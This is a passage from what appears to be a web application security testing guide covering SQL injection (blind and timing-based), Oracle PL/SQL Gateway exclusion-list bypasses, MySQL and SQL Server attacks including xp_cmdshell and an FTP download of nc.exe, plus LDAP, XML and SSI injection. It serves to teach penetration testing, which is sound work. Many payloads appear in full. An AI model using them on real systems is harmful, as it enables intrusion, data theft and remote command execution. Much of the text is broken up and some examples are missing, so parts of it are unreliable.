query. The result of the forged query will be joined to the result of the original
query, allowing the tester to obtain the values of fields of other tables. We
suppose for our examples that the query executed from the server is the
following:
SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL
SELECT creditCardNumber,1,1 FROM CreditCarTable
which will join the result of the original query with all the credit card users.
The keyword ALL is necessary to get around queries that use the keyword
DISTINCT. Moreover, we notice that beyond the credit card numbers, we
have selected other two values. These two values are necessary, because the
two query must have an equal number of parameters, in order to avoid a
syntax error.
We have pointed out that there is another category of SQL injection, called
Blind SQL Injection, in which nothing is known on the outcome of an
operation. For example, this behavior happens in cases where the
programmer has created a custom error page that does not reveal anything on
the structure of the query or on the database. (The page does not return a SQL
error, it may just return a HTTP 500).
By using the inference methods, it is possible to avoid this obstacle and thus to
succeed to recover the values of some desired fields. This method consists of
carrying out a series of boolean queries to the server, observing the answers
and finally deducing the meaning of such answers. We consider, as always, the
www.example.com domain and we suppose that it contains a parameter named
id vulnerable to SQL injection. This means that carrying out the following
request:
http://www.example.com/index.php?id=1'
we will get one page with a custom message error which is due to a syntactic
error in the query. We suppose that the query executed on the server is:
ASCII (char): it gives back ASCII value of the input character. A null value is
returned if char is 0.
LENGTH (text): it gives back the length in characters of the input text.
Through such functions, we will execute our tests on the first character and,
when we have discovered the value, we will pass to the second and so on,
until we will have discovered the entire value. The tests will take advantage of
the function SUBSTRING, in order to select only one character at a time
(selecting a single character means to impose the length parameter to 1), and
the function ASCII, in order to obtain the ASCII value, so that we can do
numerical comparison. The results of the comparison will be done with all the
values of the ASCII table, until the right value is found. As an example, we
will use the following value for Id:
The previous example returns a result if and only if the first character of the
field username is equal to the ASCII value 97. If we get a false value, then we
increase the index of the ASCII table from 97 to 98 and we repeat the request.
If instead we obtain a true value, we set to zero the index of the ASCII table
and we analyze the next character, modifying the parameters of the
SUBSTRING function. The problem is to understand in which way we can
distinguish tests returning a true value from those that return false. To do this,
we create a query that always returns false. This is possible by using the
following value for Id:
SELECT field1, field2, field3 FROM Users WHERE Id='1' AND '1' = '2'
The obtained response from the server (that is HTML code) will be the
false value for our tests. This is enough to verify whether the value
obtained from the execution of the inferential query is equal to the value
obtained with the test executed before. Sometimes, this method does not
work. If the server returns two different pages as a result of two identical
consecutive web requests, we will not be able to discriminate the true
value from the false value. In these particular cases, it is necessary to use
particular filters that allow us to eliminate the code that changes between
the two requests and to obtain a template. Later on, for every inferential
request executed, we will extract the relative template from the response
using the same function, and we will perform a control between the two
templates in order to decide the result of the test.
The query returns either true or false. If we obtain true, then we have
completed inference and, therefore, we know the value of the parameter. If
we obtain false, this means that the null character is present in the value of
the parameter, and we must continue to analyze the next parameter until we
find another null value.
The blind SQL injection attack needs a high volume of queries. The tester may
need an automatic tool to exploit the vulnerability.
Oracle Testing
Web based PL/SQL applications are enabled by the PL/SQL Gateway - it is the
component that translates web requests into database queries. Oracle has
developed a number of software implementations ranging from the early web
listener product to the Apache mod_plsql module to the XML Database (XDB)
web server. All have their own quirks and issues, each of which will be
thoroughly investigated in this paper. Products that use the PL/SQL Gateway
include, but are not limited to, the Oracle HTTP Server, eBusiness Suite,
Portal, HTMLDB, WebDB and Oracle Application Server.
1) The web server accepts request from a web client and determines it
should be processed by the PL/SQL Gateway
4) The database server executes the procedure and sends the results
back to the Gateway as HTML
5) Gateway via the web server sends a response back to the client
Understanding this is important - the PL/SQL code does not exist on the web
server but, rather, in the database server. This means that any weaknesses in
the PL/SQL Gateway, or any weaknesses in the PL/SQL application, when
exploited, give an attacker direct access to the database server; no amount of
firewalls will prevent this.
URLs for PL/SQL web applications are normally easily recognizable and
generally start with the following (xyz can be any string and represents a
Database Access Descriptor, which you will learn more about later):
http://www.example.com/pls/xyz
http://www.example.com/xyz/owa
http://www.example.com/xyz/plsql
While the second and third of these examples represent URLs from older
versions of the PL/SQL Gateway, the first is from more recent versions
running on Apache. In the plsql.conf Apache configuration file, /pls is the
default, specified as a Location with the PLS module as the handler. The
location need not be /pls, however. The absence of a file extension in a URL
could indicate the presence of the Oracle PL/SQL Gateway. Consider the
following URL:
http://www.server.com/aaa/bbb/xxxxx.yyyyy
http://www.server.com/pls/xyz/webuser.pkg.proc
SIMPLEDAD
HTMLDB
ORASSO
SSODAD
PORTAL
PORTAL2
PORTAL30
PORTAL30_SSO
TEST
DAD
APP
ONLINE
DB
OWA
The web server's response headers are a good indicator as to whether the
server is running the PL/SQL Gateway. The table below lists some of the
typical server response headers:
Oracle-Application-Server-10g
Oracle-Application-Server-
10g/10.1.2.0.0 Oracle-HTTP-
Server Oracle-Application-
Server-10g/9.0.4.1.0 Oracle-
HTTP-Server Oracle-
Application-Server-10g
OracleAS-Web-Cache-
10g/9.0.4.2.0 (N) Oracle-
Application-Server-10g/9.0.4.0.0
SQL> BEGIN
2 NULL;
3 END;
4 /
We can use this to test if the server is running the PL/SQL Gateway. Simply
take the DAD and append NULL then append NOSUCHPROC:
http://www.example.com/pls/dad/null
http://www.example.com/pls/dad/nosuchproc
If the server responds with a 200 OK response for the first and a 404 Not
Found for the second then it indicates that the server is running the PL/SQL
Gateway.
http://www.example.com/pls/dad/owa_util.signature
or
If you don't get this response but a 403 Forbidden response then you can
infer that the PL/SQL Gateway is running. This is the response you should
get in later versions or patched systems.
http://www.example.com/pls/dad/OWA_UTIL.CELLSPRINT?
P_THEQUERY=SELECT+USERNAME+FROM+ALL_USERS
Cross Site Scripting attacks could be launched via the HTP package:
http://www.example.com/pls/dad/HTP.PRINT?CBUF=<script>alert('XSS')
</script>
http://www.example.com/pls/dad/CXTSYS.DRILOAD.VALIDATE_STMT?
SQLSTMT=SELECT+1+FROM+DUAL
This will return a blank HTML page with a 200 OK response if the
database server is still vulnerable to this flaw (CVE-2006-0265)
Over the years the Oracle PL/SQL Gateway has suffered from a number of
flaws including access to admin pages (CVE-2002-0561), buffer overflows
(CVE-2002-0559), directory traversal bugs and vulnerabilities that can allow
attackers bypass the Exclusion List and go on to access and execute arbitrary
PL/SQL packages in the database server.
It is incredible how many times Oracle has attempted to fix flaws that allow
attackers to bypass the exclusion list. Each patch that Oracle has produced has
fallen victim to a new bypass technique.
When Oracle first introduced the PL/SQL Exclusion List to prevent attackers
from accessing arbitrary PL/SQL packages, it could be trivially bypassed by
preceding the name of the schema/package with a hex encoded newline
character or space or tab:
http://www.example.com/pls/dad/%0ASYS.PACKAGE.PROC
http://www.example.com/pls/dad/%20SYS.PACKAGE.PROC
http://www.example.com/pls/dad/%09SYS.PACKAGE.PROC
Later versions of the Gateway allowed attackers to bypass the exclusion list
be preceding the name of the schema/package with a label. In PL/SQL a label
points to a line of code that can be jumped to using the GOTO statement and
takes the following form: <<NAME>>
http://www.example.com/pls/dad/<<LBL>>SYS.PACKAGE.PROC
Simply placing the name of the schema/package in double quotes could allow
an attacker to bypass the exclusion list. Note that this will not work on Oracle
Application Server 10g as it converts the user's request to lowercase before
sending it to the database server and a quote literal is case sensitive - thus
"SYS" and "sys" are not the same, and requests for the latter will result in a
404 Not Found. On earlier versions though the following can bypass the
exclusion list:
http://www.example.com/pls/dad/"SYS".PACKAGE.PROC
Depending upon the character set in use on the web server and on the database
server some characters are translated. Thus, depending upon the character sets
in use, the "" character (0xFF) might be converted to a "Y" at the database
server. Another character that is often converted to an upper case "Y" is the
Macron character - 0xAF. This may allow an attacker to bypass the exclusion
list:
http://www.example.com/pls/dad/S%FFS.PACKAGE.PROC
http://www.example.com/pls/dad/S%AFS.PACKAGE.PROC
Some versions of the PL/SQL Gateway allow the exclusion list to be bypassed
with a backslash - 0x5C:
http://www.example.com/pls/dad/%5CSYS.PACKAGE.PROC
This is the most complex method of bypassing the exclusion list and is
the most recently patched method. If we were to request the following
http://www.example.com/pls/dad/foo.bar?xyz=123
the application server would execute the following at the database server:
1 declare
2 rc__ number;
3 start_time__ binary_integer;
4 simple_list__ owa_util.vc_arr;
complex_list__
5 owa_util.vc_arr;
6 begin
7 start_time__ := dbms_utility.get_time;
8 owa.init_cgi_env(:n__,:nm__,:v__);
9 htp.HTBUF_LEN := 255;
10 null;
11 null;
12 simple_list__(1) := 'sys.%';
13 simple_list__(2) := 'dbms\_%';
14 simple_list__(3) := 'utl\_%';
15 simple_list__(4) := 'owa\_%';
16 simple_list__(5) := 'owa.%';
17 simple_list__(6) := 'htp.%';
18 simple_list__(7) := 'htf.%';
19 if ((owa_match.match_pattern('foo.bar', simple_list__,
complex_list__, true))) then
20 rc__ := 2;
21 else
22 null;
23 orasso.wpg_session.init();
24 foo.bar(XYZ=>:XYZ);
25 if (wpg_docload.is_file_download) then
26 rc__ := 1;
27 wpg_docload.get_download_file(:doc_info);
28 orasso.wpg_session.deinit();
29 null;
30 null;
31 commit;
32 else
33 rc__ := 0;
34 orasso.wpg_session.deinit();
35 null;
36 null;
37 commit;
38 owa.get_page(:data__,:ndata__);
39 end if;
40 end if;
41 :rc__ := rc__;
42 :db_proc_time__ := dbms_utility.get_timestart_time__;
43 end;
Notice lines 19 and 24. On line 19 the users request is checked against a list
of known bad strings - the exclusion list. If the users requested package
and procedure do not contain bad strings, then the procedure is executed on
line 24. The XYZ parameter is passed as a bind variable.
http://server.example.com/pls/dad/INJECT'POINT
..
18 simple_list__(7) := 'htf.%';
19 if ((owa_match.match_pattern('inject'point', simple_list__,
complex_list__, true))) then
20 rc__ := 2;
21 else
22 null;
23 orasso.wpg_session.init();
24 inject'point;
..
This generates an error in the error log: PLS-00103: Encountered the symbol
POINT when expecting one of the following. .
PORTAL.WWV_HTP.CENTERCLOSE
ORASSO.HOME
WWC_VERSION.GET_HTTP_DATABASE_INFO
Picking one of these that actually exists (i.e. returns a 200 OK when
requested), if an attacker requests:
http://server.example.com/pls/dad/orasso.home?FOO=BAR
the server should return a 404 File Not Found response because the
orasso.home procedure does not require parameters and one has been
supplied. However, before the 404 is returned, the following PL/SQL is
executed:
..
..
if ((owa_match.match_pattern('orasso.home', simple_list__,
complex_list__, true))) then rc__ := 2;
else
null;
orasso.wpg_session.init();
orasso.home(FOO=>:FOO);
..
..
Note the presence of FOO in the attackers query string. They can abuse this
to run arbitrary SQL. First, they need to close the brackets:
http://server.example.com/pls/dad/orasso.home?);--=BAR
..
orasso.home();--=>:);--);
..
Note that everything after the double minus (--) is treated as a comment. This
request will cause an internal server error because one of the bind variables is
no longer used, so the attacker needs to add it back. As it happens, its this
bind variable that is the key to running arbitrary PL/SQL. For the moment, they
can just use HTP.PRINT to print BAR, and add the needed bind variable as :1:
http://server.example.com/pls/dad/orasso.home?);HTP.PRINT(:1);--=BAR
This should return a 200 with the word BAR in the HTML. Whats
happening here is that everything after the equals sign - BAR in this case - is
the data inserted into the bind variable. Using the same technique its possible
to also gain access to owa_util.cellsprint again:
http://www.example.com/pls/dad/orasso.home?);OWA_UTIL.CELLSPRINT(:1);-
-
=SELECT+USERNAME+FROM+ALL_USERS
To execute arbitrary SQL, including DML and DDL statements, the attacker
inserts an execute immediate :1:
http://server.example.com/pls/dad/orasso.home?);execute%20immediate%20:1;-
- =select%201%20from%20dual
Note that the output wont be displayed. This can be leveraged to exploit
any PL/SQL injection bugs owned by SYS, thus enabling an attacker to
gain complete control of the backend database server. For example, the
following URL takes advantage of the SQL injection flaws in
DBMS_EXPORT_EXTENSION (see
http://secunia.com/advisories/19860)
http://www.example.com/pls/dad/orasso.home?);
execute%20immediate%20:1;--
=DECLARE%20BUF%20VARCHAR2(2000);%20BEGIN%20
BUF:=SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES
('INDEX_NAME','INDEX_SCHEMA','DBMS_OUTPUT.PUT_LINE(:p1);
EXECUTE%20IMMEDIATE%20''CREATE%20OR%20REPLACE%20
PUBLIC%20SYNONYM%20BREAKABLE%20FOR%20SYS.OWA_UTIL'';
END;--','SYS',1,'VER',0);END;
During black box security assessments, the code of the custom PL/SQL
application is not available, but still needs to be assessed for security
vulnerabilities.
embedding a single quote into the parameter and checking for error
responses (which include 404 Not Found errors). Confirming the
presence of SQL injection can be performed using the concatenation
operator,
For example, assume there is a bookstore PL/SQL web application that allows
users to search for books by a given author:
http://www.example.com/pls/bookstore/books.search?author=DICKENS
http://www.example.com/pls/bookstore/books.search?author=DICK'ENS
http://www.example.com/pls/bookstore/books.search?author=DICK'||'ENS
If this now again returns books by Charles Dickens you've confirmed SQL
injection.
MySQL Testing
SQL Injection vulnerabilities occur whenever input is used in the
construction of a SQL query without being adequately constrained or
sanitized. The use of dynamic SQL (the construction of SQL queries by
concatenation of strings) opens the door to these vulnerabilities. SQL
injection allows an attacker to access the SQL servers. It allows for the
execution of SQL code under the privileges of the user used to connect to
the database.
How to Test
When a SQL Injection is found with MySQL as DBMS backend, there are
a number of attacks that could be accomplished depending on MySQL
version and user privileges on DBMS.
MySQL comes with at least four versions used in production worldwide.
3.23.x, 4.0.x, 4.1.x and 5.0.x. Every version has a set of features proportional
to version number.
From now on, it will be supposed there is a classic SQL injection in a request
like the one described in the Section on Testing for SQL Injection.
http://www.example.com/page.php?id=2
That is, MySQL interprets escaped apostrophes (\') as characters and not as
metacharacters.
So, if the application, to work properly, needs to use constant strings, two
cases are to be differentiated:
2. Web app does not escapes single quotes escaped (' => ')
Under MySQL, there is a standard way to bypass the need of single quotes,
having a constant string to be declared without the need for single quotes.
Let's suppose we want know the value of a field named 'password' in a record
with a condition like the following: password like 'A%'
Information gathering
Fingerprinting MySQL
E.g.:
Result Expected:
Version
3. By using comment
fingerprinting with a version
number /*!40110 and 1=0*/
which means:
In band injection:
Inferential injection:
Result Expected:
Login User
The main one is that an anonymous user could connect (if allowed) with any
name, but the MySQL internal user is an empty name ('').
In band injection:
Inferential injection:
Result Expected:
In band injection:
Inferential injection:
Attack vectors
Write in a File
If connected user has FILE privileges _and_ single quotes are not escaped, it
could be used the 'into outfile' clause to export query results in a file.
N.B. there are no ways to bypass single quotes surrounding the filename.
So if there's some sanitization on single quotes like escape (\') there will
be no way to use the 'into outfile' clause.
Example:
Result Expected:
Results are stored in a file with rw-rw-rw privileges owned by MySQL user
and group.
//field
values//
<%jsp
code
here%>
Load_file is a native function that can read a file when allowed by filesystem
permissions.
If a connected user has FILE privileges, it could be used to get the files
content.
load_file('filename')
Result Expected:
The whole file will be available for exporting by using standard techniques.
In a standard SQL injection, you can have results displayed directly in a page
as normal output or as a MySQL error. By using already mentioned SQL
Injection attacks, and the already described MySQL features, direct SQL
injection could be easily accomplished at a level depth depending primarily on
the MySQL version the pentester is facing.
Out of band injection could be accomplished by using the 'into outfile' clause.
String Length:
LENGTH(str)
BENCHMARK(#ofcicles,action_to_be_performed )
Let's see now some examples of specific SQL Server attacks that use the
aforementioned functions. Most of these examples will use the exec function.
Below we show how to execute a shell command that writes the output of the
command dir c:\inetpub in a browseable file, assuming that the web server and
the DB server reside on the same host. The following syntax uses
xp_cmdshell:
exec master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\test.txt'--
/controlboard.asp?
boardID=2&itemnum=1%20AND%201=CONVERT(int,%20db_name())
CONVERT will try to convert the result of db_name (a string) into an integer
variable, triggering an error, which, if displayed by the vulnerable
application, will contain the name of the DB.
/form.asp?prop=33%20union%20select%201,2006-01-06,2007-01-
06,1,'stat','name1','name2',2006-01-06,1,@@version%20--
And here's the same attack, but using again the conversion trick:
/controlboard.asp?
boardID=2&itemnum=1%20AND%201=CONVERT(int,%20@@VERSION)
https://vulnerable.web.app/login.asp?
Username='%20or%20'1'='1&Password='%20or%20'1'='1
If the application is using Dynamic SQL queries, and the string gets
appended to the user credentials validation query, this may result in a
successful login to the application.
https://vulnerable.web.app/list_report.aspx?
number=001%20UNION%20ALL%201,1,'a',1,1,1%20FROM%20users;--
POST
https://vulnerable.web.app/forgotpass.asp
HTTP/1.1
Host:
vulnerable.web.app
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,
;q=0.5
Accept-
Language:
en-
us,en;q=0.5
Accept-
Charset:
ISO-
8859-
1,utf-
8;q=0.7,*;q=0.7
Keep-
Alive:
300
Proxy-Connection: keep-alive
Referer:
http://vulnerable.web.app/forgotpass.asp
Content-
Type:
application/x-
www-
form-
urlencoded
Content-
Length:
50
email=%27&whichSubmit=submit&submit.x=0&submit.y=0
The error message obtained when a ' (single quote) character is entered at the
email field is:
/forgotpass.asp, line 15
CREATE PROCEDURE
xp_cmdshell(@cmd
varchar(255), @Wait int = 0)
AS DECLARE @result int,
@OLEResult int,
@RunResult int
EXECUTE @OLEResult
= sp_OACreate
'WScript.Shell',
@ShellID OUT IF
@OLEResult <> 0
SELECT @result =
@OLEResult
IF @OLEResult <>
0 RAISERROR
('Run %0X', 14, 1,
@OLEResult)
EXECUTE
@OLEResult =
sp_OADestroy
@ShellID
return @result
This code, written by Antonin Foller (see links at the bottom of the page),
creates a new xp_cmdshell using sp_oacreate, sp_method and sp_destroy
(as long as they haven't been disabled too, of course). Before using it, we
need to delete the first xp_cmdshell we created (even if it was not
working), otherwise the two declarations will collide.
master..sp_configure
'show
advanced
options',1
reconfigure
master..sp_configure
'xp_cmdshell',1
reconfigure
Allows the execution of arbitrary SQL Code. The same happens with the User-
Agent header set to:
User-Agent: user_agent', 'some_ip'); [SQL CODE]--
In SQL Server, one of the most useful (at least for the penetration tester)
commands is OPENROWSET, which is used to run a query on another DB
Server and retrieve the results. The penetration tester can use this command
to scan ports of other machines in the target network, injecting the following
query:
select * from
OPENROWSET('SQLOLEDB','uid=sa;pwd=foobar;Network=DBMSSOCN;Address=x.y.w
t 1')--
On the other hand, if the port is open, one of the following errors will be
returned:
OLE DB provider 'sqloledb' reported an error. The provider did not give any
information about the error.
Of course, the error message is not always available. If that is the case, we
can use the response time to understand what is going on: with a closed port,
the timeout (5 seconds in this example) will be consumed, whereas an open
port will return the result right away.
exec
master..xp_cmdshell
'echo PASS >>
ftpscript.txt';--
exec
master..xp_cmdshell
'echo bin >>
ftpscript.txt';--
exec master..xp_cmdshell
'echo get nc.exe >>
ftpscript.txt';-- exec
master..xp_cmdshell
'echo quit >>
ftpscript.txt';--
If FTP is not allowed by the firewall, we have a workaround that exploits the
Windows debugger, debug.exe, that is installed by default in all Windows
machines. Debug.exe is scriptable and is able to create an executable by
executing an appropriate script file. What we need to do is to convert the
executable into a debug script (which is a 100% ASCII file), upload it line by
line and finally call debug.exe on it. There are several tools that create such
debug files (e.g.: makescr.exe by Ollie Whitehouse and dbgtool.exe by
toolcrypt.org). The queries to inject will therefore be the following:
....
There are tools that automate this process, most notably Bobcat, which runs
on Windows, and Sqlninja, which runs on Unix (See the tools at the bottom of
this page).
Not all is lost when the web application does not return any information --
such as descriptive error messages (cf. Blind SQL Injection). For example, it
might happen that one has access to the source code (e.g., because the web
application is based on an open source software). Then, the pen tester can
exploit all the SQL injection vulnerabilities discovered offline in the web
application. Although an IPS might stop some of these attacks, the best way
would be to proceed as follows: develop and test the attacks in a testbed
created for that purpose, and then execute these attacks against the web
application being tested.
Other options for out of band attacks are described in Sample 4 above.
Blind SQL injection attacks
Alternatively, one may play lucky. That is the attacker may assume that there
is a blind or out-of-band SQL injection vulnerability in a web application.
He will then select an attack vector (e.g., a web entry), use fuzz vectors
([[1]]) against this channel and watch the response. For example, if the web
application is looking for a book using a query
then the penetration tester might enter the text: 'Bomba' OR 1=1- and if
data is not properly validated, the query will go through and return the
whole list of books. This is evidence that there is a SQL injection
vulnerability. The penetration tester might later play with the queries in
order to assess the criticality of this vulnerability.
Timing attacks
There is one more possibility for making a blind SQL injection attack when
there is not visible feedback from the application: by measuring the time that
the web application takes to answer a request. An attack of this sort is
described by Anley in ([2]) from where we take the next examples. A typical
approach uses the waitfor delay command: let's say that the attacker wants to
check if the 'pubs' sample database exists, he will simply inject the following
command:
Depending on the time that the query takes to return, we will know the
answer. In fact, what we have here is two things: a SQL injection
vulnerability and a covert channel that allows the penetration tester to get
one bit of information for each query. Hence, using several queries (as many
queries as the bits in the required information) the pen tester can get any data
that is in the database. Look at the following query
declare
@s
varchar(8000)
declare
@i
int
select
@s
=
db_name()
select
@i
=
[some
value]
Measuring the response time and using different values for @i, we
can deduce the length of the name of the current database, and then
start to extract the name itself with the following query:
This query will wait for 5 seconds if bit '@bit' of byte '@byte' of the
name of the current database is 1, and will return at once if it is 0.
Nesting two cycles (one for @byte and one for @bit) we will we able to
extract the whole piece of information.
However, it might happen that the command waitfor is not available (e.g.,
because it is filtered by an IPS/web application firewall). This doesn't mean
that blind SQL injection attacks cannot be done, as the pen tester should only
come up with any time consuming operation that is not filtered. For example
declare
@i
int
select
@i
=
0
while
@i
<
0xaffff
begin
select
@i
=
@i
+
1
end
The same timing approach can be used also to understand which version of
SQL Server we are dealing with. Of course we will leverage the built-in
@@version variable. Consider the following query:
select @@version
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37
<snip>
The '2005' part of the string spans from the 22nd to the 25th character.
Therefore, one query to inject can be the following:
Such query will wait 5 seconds if the 25th character of the @@version
variable is '5', showing us that we are dealing with a SQL Server 2005. If the
query returns immediately, we are probably dealing with SQL Server 2000,
and another similar query will help to clear all doubts.
Intelligent Injection
A web application could use LDAP in order to let a user to login with his
own credentials or search other users information inside a corporate
structure.
The extend of success for the attacker as a result of this approach is thus:
Search Parameters
The scenario is we have a web app using a search parameter like the following
one:
searchfilter="(cn="+user+")"
http://www.example.com/ldapsearch?user=Tom
http://www.example.com/ldapsearch?user=*
searchfilter="(cn=*)"
Log On Credentials
If a web app uses a vulnerable login page script with an LDAP query for
user credentials, it is possible to circumvent/bypass the check for
user/password presence by injecting an always true LDAP query (in a
similar way to SQL and XPATH injection ).
Let's suppose a web app uses a filter to match LDAP user/password pair.
searchlogin= "(&(uid="+user+")(userPassword=
{MD5}"+base64(pack("H*",md5(pass)))+"))";
user=*)(uid=*))(|(uid=*
pass=password
searchlogin="(&(uid=*)(uid=*))(|(uid=*)(userPassword=
{MD5}X03MO1qnZdYdgyfeuILPmQ==))";
This is always true. This way the penetration tester will gain logged-in status
as a super user in LDAP tree.
Object Relational Mapping (ORM) Tool Vulnerabilities
ORM tools are useful expedite object-oriented development code within the
data access layer of the OSI model in software applications, including web
applications. The benefits of using an ORM tool include quick generation of an
object layer to communicate to a relational database, standardized code
templates for these objects, and usually a set of safe functions to protect
against SQL Injection attacks. ORM generated objects can use SQL or in some
cases, a variant of SQL, to perform CRUD (Create, Read, Update, Delete)
operations on a database. It is possible, however, for a web application using
ORM generated objects to be vulnerable to SQL Injection attacks if they are
developed to not block unsanitized input parameters. In other words if these
functions are not used and the developer uses custom functions that accept user
input, it may be possible to execute a SQL injection attack.
If a tester has access to the source code for a web application, or can
discover vulnerabilities of an ORM tool and test web applications that use
this tool, there is a higher probability of successfully attacking the
application. Patterns to look for in code include:
Sending "' OR 1--" in the form where order date can be entered can yield
positive results.
ORM tools include Hibernate for Java, NHibernate for .NET, ActiveRecord
for Ruby on Rails and EZPDO for PHP.
XML Attacks
These attacks entail trying to inject an XML doc to an application. For
example:
<?
xml
version="1.0"
encoding="ISO-
8859-
1"?
>
<users>
<user>
<username>gandalf</username>
<password>!c3</password>
<userid>0<userid/>
<mail>gandalf@middleearth.com</mail>
</user>
<user>
<username>Stefan0</username>
<password>w1s3c</password>
<userid>500<userid/>
<mail>Stefan0@whysec.hmm</mail>
</user>
</users>
Username: tony
Password: Un6R34kb!e
E-mail: s4tan@hell.com
http://www.example.com/addUser.php?
username=tony&password=Un6R34kb!e&email=s4tan@hell.com
<user>
<username>tony</username>
<password>Un6R34kb!e</password>
<userid>500<userid/>
<mail>s4tan@hell.com</mail>
</user>
<?
xml
version="1.0"
encoding="ISO-
8859-
1"?
>
<users>
<user>
<username>gandalf</username>
<password>!c3</password>
<userid>0<userid/>
<mail>gandalf@middleearth.com</mail>
</user>
<user>
<username>Stefan0</username>
<password>w1s3c</password>
<userid>500<userid/>
<mail>Stefan0@whysec.hmm</mail>
</user>
<user>
<username>tony</username>
<password>Un6R34kb!e</password>
<userid>500<userid/>
<mail>s4tan@hell.com</mail>
</user>
</users>
Discovery
The first step in testing an application for the presence of a XML Injection
vulnerability, consists of trying to insert XML metacharacters.
Single quote: ' - When not sanitized, this character could throw an
exception during XMLparsing if the injected value is going to be part of
an attribute value in a tag. As an example, let's suppose there is the
following attribute:
So, if:
<node attrib='foo''/>
So if:
<node attrib="foo""/>
Angular parenthesis:
> and < - By adding
an open or closed
angular parenthesis in
a user input like the
following:
Username = foo<
<user>
<username>foo<</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>s4tan@hell.com</mail>
</user>
but the presence of an open '<' will deny the validation of XML data.
Username = foo<!--
<user>
<username>foo<!-
-
</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>s4tan@hell.com</mail>
</user>
For example:
<tagnode><</tagnode>
is well formed and valid, and represents the '<' ASCII character.
If '&' is not encoded itself with & it could be used to test XML injection.
Username = &foo
<user>
<username>&foo</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>s4tan@hell.com</mail>
</user>
but as &foo doesn't has a final ';' and moreover the &foo; entity is defined
nowhere, the XML is not valid.
CDATA begin/end tags: <![CDATA[ / ]]> - When CDATA tag is used, every
character enclosed by it is not parsed by the XML parser.
Often this is used when there are metacharacters inside a text node which are
to be considered as text values.
For example if there is the need to represent the string '<foo>' inside a text
node it could be used CDATA in the following way:
<node>
<![CDATA[<foo>]]>
</node>
<username><![CDATA[<$userName]]></username>
the tester could try to inject the end CDATA sequence ']]>' in order to try to
invalidate XML.
userName = ]]>
<username><![CDATA[]]>]]></username>
External Entity
Another test is related to CDATA tag. When the XML document is parsed, the
CDATA value will be eliminated, so it is possible to add a script if the tag
contents will be shown in the HTML page. Suppose there is a node containing
text that will be displayed at the user. If this text could be modified, as the
following:
<html>
$HTMLCode
</html>
it is possible to avoid the input filter by inserting HTML text that uses CDATA
tag. For example inserting the following value:
$HTMLCode = <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<!
[CDATA[<]]>/script<![CDATA[>]]>
<html>
<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<!
[CDATA[>]]>
</html>
that in analysis phase will eliminate the CDATA tag and will insert the
following value in the HTML:
<script>alert('XSS')</script>
Entity: It's possible to define an entity using the DTD. Entity-name as &. is an
example of entity. It's possible to specify a URL as an entity: in this way you
create a possible vulnerability by XML External Entity (XEE). So, the last test
to try is formed by the following strings:
<?
xml
version="1.0"
encoding="ISO-
8859-
1"?
>
<!DOCTYPE
foo
[
This test could crash the web server (Linux system), because we are
trying to create an entity with an infinite number of chars. Other tests are
the following:
<?
xml
version="1.0"
encoding="ISO-
8859-
1"?
>
<!DOCTYPE
foo
[
<?
xml
version="1.0"
encoding="ISO-
8859-
1"?
>
<!DOCTYPE
foo
[
<?
xml
version="1.0"
encoding="ISO-
8859-
1"?
>
<!DOCTYPE
foo
[
<?
xml
version="1.0"
encoding="ISO-
8859-
1"?
>
<!DOCTYPE
foo
[
The goal of these tests is to obtain information about the structure of the XML
database. If we analyze these errors, we can find a lot of useful information in
relation to the adopted technology.
Tag Injection
Once the first step is accomplished, the tester will have some information
about XML structure, so it is possible to try to inject XML data and tags.
Username: tony
Password: Un6R34kb!e
E-mail: s4tan@hell.com</mail><userid>0</userid><mail>s4tan@hell.com
the application will build a new node and append it to the XML database:
<users>
<user>
<username>gandalf</username>
<password>!c3</password>
<userid>0</userid>
<mail>gandalf@middleearth.com</mail>
</user>
<user>
<username>Stefan0</username>
<password>w1s3c</password>
<userid>500</userid>
<mail>Stefan0@whysec.hmm</mail>
</user>
<user>
<username>tony</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>s4tan@hell.com</mail><userid>0</userid>
<mail>s4tan@hell.com</mail>
</user>
</users>
The resulting XML file will be well formed, and it is likely that the userid tag
will be considered with the latter value (0 = admin id). The only shortcoming
is that userid tag exists two times in the last user node, and often an XML file
is associated with a schema or a DTD. Let's suppose now that XML structure
has the following DTD:
<!DOCTYPE users [
<!ELEMENT
user
(username,password,userid,mail+)
>
<!ELEMENT
username
(#PCDATA)
>
<!ELEMENT
password
(#PCDATA)
>
<!ELEMENT
userid
(#PCDATA)
>
<!ELEMENT
mail
(#PCDATA)
>
]>
If the tester can control some values for nodes enclosing the userid tag
(like in this example), by injection a comment start/end sequence like
the following:
Username: tony
Password: Un6R34kb!e</password><userid>0</userid>
<mail>s4tan@hell.com
The XML database file will be :
<?
xml
version="1.0"
encoding="ISO-
8859-
1"?
>
<users>
<user>
<username>gandalf</username>
<password>!c3</password>
<userid>0</userid>
<mail>gandalf@middleearth.com</mail>
</user>
<user>
<username>Stefan0</username>
<password>w1s3c</password>
<userid>500</userid>
<mail>Stefan0@whysec.hmm</mail>
</user>
<user>
<username>tony</username>
<password>Un6R34kb!e</password>
<!--
</password>
<userid>500</userid>
<mail>-->
<userid>0</userid>
<mail>s4tan@hell.com</mail>
</user>
</users>
This way, the original userid tag will be commented out and the one
injected will be parsed in compliance to DTD rules. The result is that
user 'tony' will be logged with userid=0 ( which could be an
administrator uid)
Server Side Vulnerabilities
Vulnerabilities occur where Web servers give to the developer the possibility
of adding small pieces of dynamic code inside static HTML pages, without
having to play with full-fledged server-side or client-side languages. This
feature is adopted by the Server-Side Includes (SSI), a very simple extension
that can enable an attacker to inject code into HTML pages, or even perform
remote code execution.
Server-Side Includes are directives that the web server parses before
serving the page to the user. They represent an alternative to writing CGI
program or embedding code using server-side scripting languages, when
there's only need to perform very simple tasks. Common SSI
implementations provide commands to include external files, to set and print
web server CGI environment variables, and to execute external CGI scripts
or system commands.
<!-
-
#echo
var="DATE_LOCAL"
-
-
> to
print
out
the
current
time.
Then, if the web server's SSI support is enabled, the server will parse these
